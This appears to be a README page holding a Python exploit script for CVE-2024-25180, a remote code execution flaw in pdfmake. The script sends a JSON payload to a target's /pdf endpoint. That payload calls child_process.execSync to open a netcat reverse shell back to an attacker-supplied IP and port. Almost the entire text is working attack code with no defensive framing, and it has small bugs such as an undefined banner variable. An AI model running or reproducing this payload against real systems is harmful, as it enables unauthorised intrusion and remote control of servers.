README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import requests
print("CVE-2024-25180 Remote Code Execution in pdfmake")
if len(sys.argv) != 5:
print(banner)
print("Usage: {} <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>".format(sys.argv[0]))
sys.exit(1)
target_ip = sys.argv[1]
target_port = sys.argv[2]
local_ip = sys.argv[3]
local_port = sys.argv[4]
url = f"http://{target_ip}:{target_port}/pdf"
headers = {'Content-Type': 'application/json'}
data = {
"content": "this.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {} {} >/tmp/f').toString(); const dd = 2".format(local_ip, local_port)
}
try:
response = requests.post(url, headers=headers, json=data, verify=False)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")